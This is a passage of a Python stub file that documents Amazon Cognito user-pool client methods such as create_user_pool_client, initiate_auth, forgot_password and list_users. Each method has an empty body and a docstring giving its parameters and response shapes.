def create_user_pool_client(UserPoolId=None, ClientName=None, GenerateSecret=None, RefreshTokenValidity=None, ReadAttributes=None, WriteAttributes=None, ExplicitAuthFlows=None, SupportedIdentityProviders=None, CallbackURLs=None, LogoutURLs=None, DefaultRedirectURI=None, AllowedOAuthFlows=None, AllowedOAuthScopes=None, AllowedOAuthFlowsUserPoolClient=None):
"""
Creates the user pool client.
See also: AWS API Documentation
:example: response = client.create_user_pool_client(
UserPoolId='string',
ClientName='string',
GenerateSecret=True|False,
RefreshTokenValidity=123,
ReadAttributes=[
'string',
],
WriteAttributes=[
'string',
],
ExplicitAuthFlows=[
'ADMIN_NO_SRP_AUTH'|'CUSTOM_AUTH_FLOW_ONLY',
],
SupportedIdentityProviders=[
'string',
],
CallbackURLs=[
'string',
],
LogoutURLs=[
'string',
],
DefaultRedirectURI='string',
AllowedOAuthFlows=[
'code'|'implicit'|'client_credentials',
],
AllowedOAuthScopes=[
'string',
],
AllowedOAuthFlowsUserPoolClient=True|False
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID for the user pool where you want to create a user pool client.
:type ClientName: string
:param ClientName: [REQUIRED]
The client name for the user pool client you would like to create.
:type GenerateSecret: boolean
:param GenerateSecret: Boolean to specify whether you want to generate a secret for the user pool client being created.
:type RefreshTokenValidity: integer
:param RefreshTokenValidity: The time limit, in days, after which the refresh token is no longer valid and cannot be used.
:type ReadAttributes: list
:param ReadAttributes: The read attributes.
(string) --
:type WriteAttributes: list
:param WriteAttributes: The write attributes.
(string) --
:type ExplicitAuthFlows: list
:param ExplicitAuthFlows: The explicit authentication flows.
(string) --
:type SupportedIdentityProviders: list
:param SupportedIdentityProviders: A list of provider names for the identity providers that are supported on this client.
(string) --
:type CallbackURLs: list
:param CallbackURLs: A list of allowed callback URLs for the identity providers.
(string) --
:type LogoutURLs: list
:param LogoutURLs: A list of allowed logout URLs for the identity providers.
(string) --
:type DefaultRedirectURI: string
:param DefaultRedirectURI: The default redirect URI. Must be in the CallbackURLs list.
:type AllowedOAuthFlows: list
:param AllowedOAuthFlows: Set to code to initiate a code grant flow, which provides an authorization code as the response. This code can be exchanged for access tokens with the token endpoint.
Set to token to specify that the client should get the access token (and, optionally, ID token, based on scopes) directly.
(string) --
:type AllowedOAuthScopes: list
:param AllowedOAuthScopes: A list of allowed OAuth scopes. Currently supported values are 'phone' , 'email' , 'openid' , and 'Cognito' .
(string) --
:type AllowedOAuthFlowsUserPoolClient: boolean
:param AllowedOAuthFlowsUserPoolClient: Set to True if the client is allowed to follow the OAuth protocol when interacting with Cognito user pools.
:rtype: dict
:return: {
'UserPoolClient': {
'UserPoolId': 'string',
'ClientName': 'string',
'ClientId': 'string',
'ClientSecret': 'string',
'LastModifiedDate': datetime(2015, 1, 1),
'CreationDate': datetime(2015, 1, 1),
'RefreshTokenValidity': 123,
'ReadAttributes': [
'string',
],
'WriteAttributes': [
'string',
],
'ExplicitAuthFlows': [
'ADMIN_NO_SRP_AUTH'|'CUSTOM_AUTH_FLOW_ONLY',
],
'SupportedIdentityProviders': [
'string',
],
'CallbackURLs': [
'string',
],
'LogoutURLs': [
'string',
],
'DefaultRedirectURI': 'string',
'AllowedOAuthFlows': [
'code'|'implicit'|'client_credentials',
],
'AllowedOAuthScopes': [
'string',
],
'AllowedOAuthFlowsUserPoolClient': True|False
}
}
:returns:
(string) --
"""
pass
def create_user_pool_domain(Domain=None, UserPoolId=None):
"""
Creates a new domain for a user pool.
See also: AWS API Documentation
:example: response = client.create_user_pool_domain(
Domain='string',
UserPoolId='string'
)
:type Domain: string
:param Domain: [REQUIRED]
The domain string.
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID.
:rtype: dict
:return: {}
:returns:
(dict) --
"""
pass
def delete_group(GroupName=None, UserPoolId=None):
"""
Deletes a group. Currently only groups with no members can be deleted.
Requires developer credentials.
See also: AWS API Documentation
:example: response = client.delete_group(
GroupName='string',
UserPoolId='string'
)
:type GroupName: string
:param GroupName: [REQUIRED]
The name of the group.
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID for the user pool.
"""
pass
def delete_identity_provider(UserPoolId=None, ProviderName=None):
"""
Deletes an identity provider for a user pool.
See also: AWS API Documentation
:example: response = client.delete_identity_provider(
UserPoolId='string',
ProviderName='string'
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID.
:type ProviderName: string
:param ProviderName: [REQUIRED]
The identity provider name.
"""
pass
def delete_user(AccessToken=None):
"""
Allows a user to delete one's self.
See also: AWS API Documentation
:example: response = client.delete_user(
AccessToken='string'
)
:type AccessToken: string
:param AccessToken: [REQUIRED]
The access token from a request to delete a user.
"""
pass
def delete_user_attributes(UserAttributeNames=None, AccessToken=None):
"""
Deletes the attributes for a user.
See also: AWS API Documentation
:example: response = client.delete_user_attributes(
UserAttributeNames=[
'string',
],
AccessToken='string'
)
:type UserAttributeNames: list
:param UserAttributeNames: [REQUIRED]
An array of strings representing the user attribute names you wish to delete.
For custom attributes, you must prepend the custom: prefix to the attribute name.
(string) --
:type AccessToken: string
:param AccessToken: [REQUIRED]
The access token used in the request to delete user attributes.
:rtype: dict
:return: {}
"""
pass
def delete_user_pool(UserPoolId=None):
"""
Deletes the specified Amazon Cognito user pool.
See also: AWS API Documentation
:example: response = client.delete_user_pool(
UserPoolId='string'
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID for the user pool you want to delete.
"""
pass
def delete_user_pool_client(UserPoolId=None, ClientId=None):
"""
Allows the developer to delete the user pool client.
See also: AWS API Documentation
:example: response = client.delete_user_pool_client(
UserPoolId='string',
ClientId='string'
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID for the user pool where you want to delete the client.
:type ClientId: string
:param ClientId: [REQUIRED]
The ID of the client associated with the user pool.
"""
pass
def delete_user_pool_domain(Domain=None, UserPoolId=None):
"""
Deletes a domain for a user pool.
See also: AWS API Documentation
:example: response = client.delete_user_pool_domain(
Domain='string',
UserPoolId='string'
)
:type Domain: string
:param Domain: [REQUIRED]
The domain string.
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID.
:rtype: dict
:return: {}
:returns:
(dict) --
"""
pass
def describe_identity_provider(UserPoolId=None, ProviderName=None):
"""
Gets information about a specific identity provider.
See also: AWS API Documentation
:example: response = client.describe_identity_provider(
UserPoolId='string',
ProviderName='string'
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID.
:type ProviderName: string
:param ProviderName: [REQUIRED]
The identity provider name.
:rtype: dict
:return: {
'IdentityProvider': {
'UserPoolId': 'string',
'ProviderName': 'string',
'ProviderType': 'SAML',
'ProviderDetails': {
'string': 'string'
},
'AttributeMapping': {
'string': 'string'
},
'IdpIdentifiers': [
'string',
],
'LastModifiedDate': datetime(2015, 1, 1),
'CreationDate': datetime(2015, 1, 1)
}
}
:returns:
(string) --
(string) --
"""
pass
def describe_user_import_job(UserPoolId=None, JobId=None):
"""
Describes the user import job.
See also: AWS API Documentation
:example: response = client.describe_user_import_job(
UserPoolId='string',
JobId='string'
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID for the user pool that the users are being imported into.
:type JobId: string
:param JobId: [REQUIRED]
The job ID for the user import job.
:rtype: dict
:return: {
'UserImportJob': {
'JobName': 'string',
'JobId': 'string',
'UserPoolId': 'string',
'PreSignedUrl': 'string',
'CreationDate': datetime(2015, 1, 1),
'StartDate': datetime(2015, 1, 1),
'CompletionDate': datetime(2015, 1, 1),
'Status': 'Created'|'Pending'|'InProgress'|'Stopping'|'Expired'|'Stopped'|'Failed'|'Succeeded',
'CloudWatchLogsRoleArn': 'string',
'ImportedUsers': 123,
'SkippedUsers': 123,
'FailedUsers': 123,
'CompletionMessage': 'string'
}
}
:returns:
Created - The job was created but not started.
Pending - A transition state. You have started the job, but it has not begun importing users yet.
InProgress - The job has started, and users are being imported.
Stopping - You have stopped the job, but the job has not stopped importing users yet.
Stopped - You have stopped the job, and the job has stopped importing users.
Succeeded - The job has completed successfully.
Failed - The job has stopped due to an error.
Expired - You created a job, but did not start the job within 24-48 hours. All data associated with the job was deleted, and the job cannot be started.
"""
pass
def describe_user_pool(UserPoolId=None):
"""
Returns the configuration information and metadata of the specified user pool.
See also: AWS API Documentation
:example: response = client.describe_user_pool(
UserPoolId='string'
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID for the user pool you want to describe.
:rtype: dict
:return: {
'UserPool': {
'Id': 'string',
'Name': 'string',
'Policies': {
'PasswordPolicy': {
'MinimumLength': 123,
'RequireUppercase': True|False,
'RequireLowercase': True|False,
'RequireNumbers': True|False,
'RequireSymbols': True|False
}
},
'LambdaConfig': {
'PreSignUp': 'string',
'CustomMessage': 'string',
'PostConfirmation': 'string',
'PreAuthentication': 'string',
'PostAuthentication': 'string',
'DefineAuthChallenge': 'string',
'CreateAuthChallenge': 'string',
'VerifyAuthChallengeResponse': 'string'
},
'Status': 'Enabled'|'Disabled',
'LastModifiedDate': datetime(2015, 1, 1),
'CreationDate': datetime(2015, 1, 1),
'SchemaAttributes': [
{
'Name': 'string',
'AttributeDataType': 'String'|'Number'|'DateTime'|'Boolean',
'DeveloperOnlyAttribute': True|False,
'Mutable': True|False,
'Required': True|False,
'NumberAttributeConstraints': {
'MinValue': 'string',
'MaxValue': 'string'
},
'StringAttributeConstraints': {
'MinLength': 'string',
'MaxLength': 'string'
}
},
],
'AutoVerifiedAttributes': [
'phone_number'|'email',
],
'AliasAttributes': [
'phone_number'|'email'|'preferred_username',
],
'SmsVerificationMessage': 'string',
'EmailVerificationMessage': 'string',
'EmailVerificationSubject': 'string',
'SmsAuthenticationMessage': 'string',
'MfaConfiguration': 'OFF'|'ON'|'OPTIONAL',
'DeviceConfiguration': {
'ChallengeRequiredOnNewDevice': True|False,
'DeviceOnlyRememberedOnUserPrompt': True|False
},
'EstimatedNumberOfUsers': 123,
'EmailConfiguration': {
'SourceArn': 'string',
'ReplyToEmailAddress': 'string'
},
'SmsConfiguration': {
'SnsCallerArn': 'string',
'ExternalId': 'string'
},
'UserPoolTags': {
'string': 'string'
},
'SmsConfigurationFailure': 'string',
'EmailConfigurationFailure': 'string',
'AdminCreateUserConfig': {
'AllowAdminCreateUserOnly': True|False,
'UnusedAccountValidityDays': 123,
'InviteMessageTemplate': {
'SMSMessage': 'string',
'EmailMessage': 'string',
'EmailSubject': 'string'
}
}
}
}
:returns:
(string) --
"""
pass
def describe_user_pool_client(UserPoolId=None, ClientId=None):
"""
Client method for returning the configuration information and metadata of the specified user pool client.
See also: AWS API Documentation
:example: response = client.describe_user_pool_client(
UserPoolId='string',
ClientId='string'
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID for the user pool you want to describe.
:type ClientId: string
:param ClientId: [REQUIRED]
The ID of the client associated with the user pool.
:rtype: dict
:return: {
'UserPoolClient': {
'UserPoolId': 'string',
'ClientName': 'string',
'ClientId': 'string',
'ClientSecret': 'string',
'LastModifiedDate': datetime(2015, 1, 1),
'CreationDate': datetime(2015, 1, 1),
'RefreshTokenValidity': 123,
'ReadAttributes': [
'string',
],
'WriteAttributes': [
'string',
],
'ExplicitAuthFlows': [
'ADMIN_NO_SRP_AUTH'|'CUSTOM_AUTH_FLOW_ONLY',
],
'SupportedIdentityProviders': [
'string',
],
'CallbackURLs': [
'string',
],
'LogoutURLs': [
'string',
],
'DefaultRedirectURI': 'string',
'AllowedOAuthFlows': [
'code'|'implicit'|'client_credentials',
],
'AllowedOAuthScopes': [
'string',
],
'AllowedOAuthFlowsUserPoolClient': True|False
}
}
:returns:
(string) --
"""
pass
def describe_user_pool_domain(Domain=None):
"""
Gets information about a domain.
See also: AWS API Documentation
:example: response = client.describe_user_pool_domain(
Domain='string'
)
:type Domain: string
:param Domain: [REQUIRED]
The domain string.
:rtype: dict
:return: {
'DomainDescription': {
'UserPoolId': 'string',
'AWSAccountId': 'string',
'Domain': 'string',
'S3Bucket': 'string',
'CloudFrontDistribution': 'string',
'Version': 'string',
'Status': 'CREATING'|'DELETING'|'UPDATING'|'ACTIVE'
}
}
"""
pass
def forget_device(AccessToken=None, DeviceKey=None):
"""
Forgets the specified device.
See also: AWS API Documentation
:example: response = client.forget_device(
AccessToken='string',
DeviceKey='string'
)
:type AccessToken: string
:param AccessToken: The access token for the forgotten device request.
:type DeviceKey: string
:param DeviceKey: [REQUIRED]
The device key.
"""
pass
def forgot_password(ClientId=None, SecretHash=None, Username=None):
"""
Calling this API causes a message to be sent to the end user with a confirmation code that is required to change the user's password. For the Username parameter, you can use the username or user alias. If a verified phone number exists for the user, the confirmation code is sent to the phone number. Otherwise, if a verified email exists, the confirmation code is sent to the email. If neither a verified phone number nor a verified email exists, InvalidParameterException is thrown. To use the confirmation code for resetting the password, call ConfirmForgotPassword .
See also: AWS API Documentation
:example: response = client.forgot_password(
ClientId='string',
SecretHash='string',
Username='string'
)
:type ClientId: string
:param ClientId: [REQUIRED]
The ID of the client associated with the user pool.
:type SecretHash: string
:param SecretHash: A keyed-hash message authentication code (HMAC) calculated using the secret key of a user pool client and username plus the client ID in the message.
:type Username: string
:param Username: [REQUIRED]
The user name of the user for whom you want to enter a code to reset a forgotten password.
:rtype: dict
:return: {
'CodeDeliveryDetails': {
'Destination': 'string',
'DeliveryMedium': 'SMS'|'EMAIL',
'AttributeName': 'string'
}
}
"""
pass
def generate_presigned_url(ClientMethod=None, Params=None, ExpiresIn=None, HttpMethod=None):
"""
Generate a presigned url given a client, its method, and arguments
:type ClientMethod: string
:param ClientMethod: The client method to presign for
:type Params: dict
:param Params: The parameters normally passed to
ClientMethod.
:type ExpiresIn: int
:param ExpiresIn: The number of seconds the presigned url is valid
for. By default it expires in an hour (3600 seconds)
:type HttpMethod: string
:param HttpMethod: The http method to use on the generated url. By
default, the http method is whatever is used in the method's model.
"""
pass
def get_csv_header(UserPoolId=None):
"""
Gets the header information for the .csv file to be used as input for the user import job.
See also: AWS API Documentation
:example: response = client.get_csv_header(
UserPoolId='string'
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID for the user pool that the users are to be imported into.
:rtype: dict
:return: {
'UserPoolId': 'string',
'CSVHeader': [
'string',
]
}
"""
pass
def get_device(DeviceKey=None, AccessToken=None):
"""
Gets the device.
See also: AWS API Documentation
:example: response = client.get_device(
DeviceKey='string',
AccessToken='string'
)
:type DeviceKey: string
:param DeviceKey: [REQUIRED]
The device key.
:type AccessToken: string
:param AccessToken: The access token.
:rtype: dict
:return: {
'Device': {
'DeviceKey': 'string',
'DeviceAttributes': [
{
'Name': 'string',
'Value': 'string'
},
],
'DeviceCreateDate': datetime(2015, 1, 1),
'DeviceLastModifiedDate': datetime(2015, 1, 1),
'DeviceLastAuthenticatedDate': datetime(2015, 1, 1)
}
}
"""
pass
def get_group(GroupName=None, UserPoolId=None):
"""
Gets a group.
Requires developer credentials.
See also: AWS API Documentation
:example: response = client.get_group(
GroupName='string',
UserPoolId='string'
)
:type GroupName: string
:param GroupName: [REQUIRED]
The name of the group.
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID for the user pool.
:rtype: dict
:return: {
'Group': {
'GroupName': 'string',
'UserPoolId': 'string',
'Description': 'string',
'RoleArn': 'string',
'Precedence': 123,
'LastModifiedDate': datetime(2015, 1, 1),
'CreationDate': datetime(2015, 1, 1)
}
}
"""
pass
def get_identity_provider_by_identifier(UserPoolId=None, IdpIdentifier=None):
"""
Gets the specified identity provider.
See also: AWS API Documentation
:example: response = client.get_identity_provider_by_identifier(
UserPoolId='string',
IdpIdentifier='string'
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID.
:type IdpIdentifier: string
:param IdpIdentifier: [REQUIRED]
The identity provider ID.
:rtype: dict
:return: {
'IdentityProvider': {
'UserPoolId': 'string',
'ProviderName': 'string',
'ProviderType': 'SAML',
'ProviderDetails': {
'string': 'string'
},
'AttributeMapping': {
'string': 'string'
},
'IdpIdentifiers': [
'string',
],
'LastModifiedDate': datetime(2015, 1, 1),
'CreationDate': datetime(2015, 1, 1)
}
}
:returns:
(string) --
(string) --
"""
pass
def get_paginator(operation_name=None):
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is create_foo, and you'd normally invoke the
operation as client.create_foo(**kwargs), if the
create_foo operation can be paginated, you can use the
call client.get_paginator('create_foo').
:rtype: L{botocore.paginate.Paginator}
"""
pass
def get_user(AccessToken=None):
"""
Gets the user attributes and metadata for a user.
See also: AWS API Documentation
:example: response = client.get_user(
AccessToken='string'
)
:type AccessToken: string
:param AccessToken: [REQUIRED]
The access token returned by the server response to get information about the user.
:rtype: dict
:return: {
'Username': 'string',
'UserAttributes': [
{
'Name': 'string',
'Value': 'string'
},
],
'MFAOptions': [
{
'DeliveryMedium': 'SMS'|'EMAIL',
'AttributeName': 'string'
},
]
}
"""
pass
def get_user_attribute_verification_code(AccessToken=None, AttributeName=None):
"""
Gets the user attribute verification code for the specified attribute name.
See also: AWS API Documentation
:example: response = client.get_user_attribute_verification_code(
AccessToken='string',
AttributeName='string'
)
:type AccessToken: string
:param AccessToken: [REQUIRED]
The access token returned by the server response to get the user attribute verification code.
:type AttributeName: string
:param AttributeName: [REQUIRED]
The attribute name returned by the server response to get the user attribute verification code.
:rtype: dict
:return: {
'CodeDeliveryDetails': {
'Destination': 'string',
'DeliveryMedium': 'SMS'|'EMAIL',
'AttributeName': 'string'
}
}
"""
pass
def get_waiter():
"""
"""
pass
def global_sign_out(AccessToken=None):
"""
Signs out users from all devices.
See also: AWS API Documentation
:example: response = client.global_sign_out(
AccessToken='string'
)
:type AccessToken: string
:param AccessToken: [REQUIRED]
The access token.
:rtype: dict
:return: {}
"""
pass
def initiate_auth(AuthFlow=None, AuthParameters=None, ClientMetadata=None, ClientId=None):
"""
Initiates the authentication flow.
See also: AWS API Documentation
:example: response = client.initiate_auth(
AuthFlow='USER_SRP_AUTH'|'REFRESH_TOKEN_AUTH'|'REFRESH_TOKEN'|'CUSTOM_AUTH'|'ADMIN_NO_SRP_AUTH',
AuthParameters={
'string': 'string'
},
ClientMetadata={
'string': 'string'
},
ClientId='string'
)
:type AuthFlow: string
:param AuthFlow: [REQUIRED]
The authentication flow for this call to execute. The API action will depend on this value. For example:
REFRESH_TOKEN_AUTH will take in a valid refresh token and return new tokens.
USER_SRP_AUTH will take in USERNAME and SRPA and return the SRP variables to be used for next challenge execution.
Valid values include:
USER_SRP_AUTH : Authentication flow for the Secure Remote Password (SRP) protocol.
REFRESH_TOKEN_AUTH /REFRESH_TOKEN : Authentication flow for refreshing the access token and ID token by supplying a valid refresh token.
CUSTOM_AUTH : Custom authentication flow.
ADMIN_NO_SRP_AUTH is not a valid value.
:type AuthParameters: dict
:param AuthParameters: The authentication parameters. These are inputs corresponding to the AuthFlow that you are invoking. The required values depend on the value of AuthFlow :
For USER_SRP_AUTH : USERNAME (required), SRPA (required), SECRET_HASH (required if the app client is configured with a client secret), DEVICE_KEY
For REFRESH_TOKEN_AUTH/REFRESH_TOKEN : USERNAME (required), SECRET_HASH (required if the app client is configured with a client secret), REFRESH_TOKEN (required), DEVICE_KEY
For CUSTOM_AUTH : USERNAME (required), SECRET_HASH (if app client is configured with client secret), DEVICE_KEY
(string) --
(string) --
:type ClientMetadata: dict
:param ClientMetadata: This is a random key-value pair map which can contain any key and will be passed to your PreAuthentication Lambda trigger as-is. It can be used to implement additional validations around authentication.
(string) --
(string) --
:type ClientId: string
:param ClientId: [REQUIRED]
The app client ID.
:rtype: dict
:return: {
'ChallengeName': 'SMS_MFA'|'PASSWORD_VERIFIER'|'CUSTOM_CHALLENGE'|'DEVICE_SRP_AUTH'|'DEVICE_PASSWORD_VERIFIER'|'ADMIN_NO_SRP_AUTH'|'NEW_PASSWORD_REQUIRED',
'Session': 'string',
'ChallengeParameters': {
'string': 'string'
},
'AuthenticationResult': {
'AccessToken': 'string',
'ExpiresIn': 123,
'TokenType': 'string',
'RefreshToken': 'string',
'IdToken': 'string',
'NewDeviceMetadata': {
'DeviceKey': 'string',
'DeviceGroupKey': 'string'
}
}
}
:returns:
SMS_MFA : Next challenge is to supply an SMS_MFA_CODE , delivered via SMS.
PASSWORD_VERIFIER : Next challenge is to supply PASSWORD_CLAIM_SIGNATURE , PASSWORD_CLAIM_SECRET_BLOCK , and TIMESTAMP after the client-side SRP calculations.
CUSTOM_CHALLENGE : This is returned if your custom authentication flow determines that the user should pass another challenge before tokens are issued.
DEVICE_SRP_AUTH : If device tracking was enabled on your user pool and the previous challenges were passed, this challenge is returned so that Amazon Cognito can start tracking this device.
DEVICE_PASSWORD_VERIFIER : Similar to PASSWORD_VERIFIER , but for devices only.
NEW_PASSWORD_REQUIRED : For users which are required to change their passwords after successful first login. This challenge should be passed with NEW_PASSWORD and any other required attributes.
"""
pass
def list_devices(AccessToken=None, Limit=None, PaginationToken=None):
"""
Lists the devices.
See also: AWS API Documentation
:example: response = client.list_devices(
AccessToken='string',
Limit=123,
PaginationToken='string'
)
:type AccessToken: string
:param AccessToken: [REQUIRED]
The access tokens for the request to list devices.
:type Limit: integer
:param Limit: The limit of the device request.
:type PaginationToken: string
:param PaginationToken: The pagination token for the list request.
:rtype: dict
:return: {
'Devices': [
{
'DeviceKey': 'string',
'DeviceAttributes': [
{
'Name': 'string',
'Value': 'string'
},
],
'DeviceCreateDate': datetime(2015, 1, 1),
'DeviceLastModifiedDate': datetime(2015, 1, 1),
'DeviceLastAuthenticatedDate': datetime(2015, 1, 1)
},
],
'PaginationToken': 'string'
}
"""
pass
def list_groups(UserPoolId=None, Limit=None, NextToken=None):
"""
Lists the groups associated with a user pool.
Requires developer credentials.
See also: AWS API Documentation
:example: response = client.list_groups(
UserPoolId='string',
Limit=123,
NextToken='string'
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID for the user pool.
:type Limit: integer
:param Limit: The limit of the request to list groups.
:type NextToken: string
:param NextToken: An identifier that was returned from the previous call to this operation, which can be used to return the next set of items in the list.
:rtype: dict
:return: {
'Groups': [
{
'GroupName': 'string',
'UserPoolId': 'string',
'Description': 'string',
'RoleArn': 'string',
'Precedence': 123,
'LastModifiedDate': datetime(2015, 1, 1),
'CreationDate': datetime(2015, 1, 1)
},
],
'NextToken': 'string'
}
"""
pass
def list_identity_providers(UserPoolId=None, MaxResults=None, NextToken=None):
"""
Lists information about all identity providers for a user pool.
See also: AWS API Documentation
:example: response = client.list_identity_providers(
UserPoolId='string',
MaxResults=123,
NextToken='string'
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID.
:type MaxResults: integer
:param MaxResults: The maximum number of identity providers to return.
:type NextToken: string
:param NextToken: A pagination token.
:rtype: dict
:return: {
'Providers': [
{
'ProviderName': 'string',
'ProviderType': 'SAML',
'LastModifiedDate': datetime(2015, 1, 1),
'CreationDate': datetime(2015, 1, 1)
},
],
'NextToken': 'string'
}
"""
pass
def list_user_import_jobs(UserPoolId=None, MaxResults=None, PaginationToken=None):
"""
Lists the user import jobs.
See also: AWS API Documentation
:example: response = client.list_user_import_jobs(
UserPoolId='string',
MaxResults=123,
PaginationToken='string'
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID for the user pool that the users are being imported into.
:type MaxResults: integer
:param MaxResults: [REQUIRED]
The maximum number of import jobs you want the request to return.
:type PaginationToken: string
:param PaginationToken: An identifier that was returned from the previous call to ListUserImportJobs , which can be used to return the next set of import jobs in the list.
:rtype: dict
:return: {
'UserImportJobs': [
{
'JobName': 'string',
'JobId': 'string',
'UserPoolId': 'string',
'PreSignedUrl': 'string',
'CreationDate': datetime(2015, 1, 1),
'StartDate': datetime(2015, 1, 1),
'CompletionDate': datetime(2015, 1, 1),
'Status': 'Created'|'Pending'|'InProgress'|'Stopping'|'Expired'|'Stopped'|'Failed'|'Succeeded',
'CloudWatchLogsRoleArn': 'string',
'ImportedUsers': 123,
'SkippedUsers': 123,
'FailedUsers': 123,
'CompletionMessage': 'string'
},
],
'PaginationToken': 'string'
}
:returns:
Created - The job was created but not started.
Pending - A transition state. You have started the job, but it has not begun importing users yet.
InProgress - The job has started, and users are being imported.
Stopping - You have stopped the job, but the job has not stopped importing users yet.
Stopped - You have stopped the job, and the job has stopped importing users.
Succeeded - The job has completed successfully.
Failed - The job has stopped due to an error.
Expired - You created a job, but did not start the job within 24-48 hours. All data associated with the job was deleted, and the job cannot be started.
"""
pass
def list_user_pool_clients(UserPoolId=None, MaxResults=None, NextToken=None):
"""
Lists the clients that have been created for the specified user pool.
See also: AWS API Documentation
:example: response = client.list_user_pool_clients(
UserPoolId='string',
MaxResults=123,
NextToken='string'
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID for the user pool where you want to list user pool clients.
:type MaxResults: integer
:param MaxResults: The maximum number of results you want the request to return when listing the user pool clients.
:type NextToken: string
:param NextToken: An identifier that was returned from the previous call to this operation, which can be used to return the next set of items in the list.
:rtype: dict
:return: {
'UserPoolClients': [
{
'ClientId': 'string',
'UserPoolId': 'string',
'ClientName': 'string'
},
],
'NextToken': 'string'
}
"""
pass
def list_user_pools(NextToken=None, MaxResults=None):
"""
Lists the user pools associated with an AWS account.
See also: AWS API Documentation
:example: response = client.list_user_pools(
NextToken='string',
MaxResults=123
)
:type NextToken: string
:param NextToken: An identifier that was returned from the previous call to this operation, which can be used to return the next set of items in the list.
:type MaxResults: integer
:param MaxResults: [REQUIRED]
The maximum number of results you want the request to return when listing the user pools.
:rtype: dict
:return: {
'UserPools': [
{
'Id': 'string',
'Name': 'string',
'LambdaConfig': {
'PreSignUp': 'string',
'CustomMessage': 'string',
'PostConfirmation': 'string',
'PreAuthentication': 'string',
'PostAuthentication': 'string',
'DefineAuthChallenge': 'string',
'CreateAuthChallenge': 'string',
'VerifyAuthChallengeResponse': 'string'
},
'Status': 'Enabled'|'Disabled',
'LastModifiedDate': datetime(2015, 1, 1),
'CreationDate': datetime(2015, 1, 1)
},
],
'NextToken': 'string'
}
"""
pass
def list_users(UserPoolId=None, AttributesToGet=None, Limit=None, PaginationToken=None, Filter=None):
"""
Lists the users in the Amazon Cognito user pool.
See also: AWS API Documentation
:example: response = client.list_users(
UserPoolId='string',
AttributesToGet=[
'string',
],
Limit=123,
PaginationToken='string',
Filter='string'
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID for the user pool on which the search should be performed.
:type AttributesToGet: list
:param AttributesToGet: An array of strings, where each string is the name of a user attribute to be returned for each user in the search results. If the array is empty, all attributes are returned.
(string) --
:type Limit: integer
:param Limit: Maximum number of users to be returned.
:type PaginationToken: string
:param PaginationToken: An identifier that was returned from the previous call to this operation, which can be used to return the next set of items in the list.
:type Filter: string
:param Filter: A filter string of the form 'AttributeName Filter-Type 'AttributeValue ''. Quotation marks within the filter string must be escaped using the backslash () character. For example, 'family_name = 'Reddy''.
AttributeName : The name of the attribute to search for. You can only search for one attribute at a time.
Filter-Type : For an exact match, use =, for example, 'given_name = 'Jon''. For a prefix ('starts with') match, use ^=, for example, 'given_name ^= 'Jon''.
AttributeValue : The attribute value that must be matched for each user.
If the filter string is empty, ListUsers returns all users in the user pool.
You can only search for the following standard attributes:
username (case-sensitive)
email
phone_number
name
given_name
family_name
preferred_username
cognito:user_status (called Enabled in the Console) (case-sensitive)
status (case-insensitive)
Custom attributes are not searchable.
For more information, see Searching for Users Using the ListUsers API and Examples of Using the ListUsers API in the Amazon Cognito Developer Guide .
:rtype: dict
:return: {
'Users': [
{
'Username': 'string',
'Attributes': [
{
'Name': 'string',
'Value': 'string'
},
],
'UserCreateDate': datetime(2015, 1, 1),
'UserLastModifiedDate': datetime(2015, 1, 1),
'Enabled': True|False,
'UserStatus': 'UNCONFIRMED'|'CONFIRMED'|'ARCHIVED'|'COMPROMISED'|'UNKNOWN'|'RESET_REQUIRED'|'FORCE_CHANGE_PASSWORD',
'MFAOptions': [
{
'DeliveryMedium': 'SMS'|'EMAIL',
'AttributeName': 'string'
},
]
},
],
'PaginationToken': 'string'
}
:returns:
UNCONFIRMED - User has been created but not confirmed.
CONFIRMED - User has been confirmed.
ARCHIVED - User is no longer active.
COMPROMISED - User is disabled due to a potential security threat.
UNKNOWN - User status is not known.
"""
pass
def list_users_in_group(UserPoolId=None, GroupName=None, Limit=None, NextToken=None):
"""
Lists the users in the specified group.
Requires developer credentials.
See also: AWS API Documentation
:example: response = client.list_users_in_group(
UserPoolId='string',
GroupName='string',
Limit=123,
NextToken='string'
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID for the user pool.
:type GroupName: string
:param GroupName: [REQUIRED]
The name of the group.
:type Limit: integer
:param Limit: The limit of the request to list users.
:type NextToken: string
:param NextToken: An identifier that was returned from the previous call to this operation, which can be used to return the next set of items in the list.
:rtype: dict
:return: {
'Users': [
{
'Username': 'string',
'Attributes': [
{
'Name': 'string',
'Value': 'string'
},
],
'UserCreateDate': datetime(2015, 1, 1),
'UserLastModifiedDate': datetime(2015, 1, 1),
'Enabled': True|False,
'UserStatus': 'UNCONFIRMED'|'CONFIRMED'|'ARCHIVED'|'COMPROMISED'|'UNKNOWN'|'RESET_REQUIRED'|'FORCE_CHANGE_PASSWORD',
'MFAOptions': [
{
'DeliveryMedium': 'SMS'|'EMAIL',
'AttributeName': 'string'
},
]
},
],
'NextToken': 'string'
}
:returns:
UNCONFIRMED - User has been created but not confirmed.
CONFIRMED - User has been confirmed.
ARCHIVED - User is no longer active.
COMPROMISED - User is disabled due to a potential security threat.
UNKNOWN - User status is not known.
"""
pass
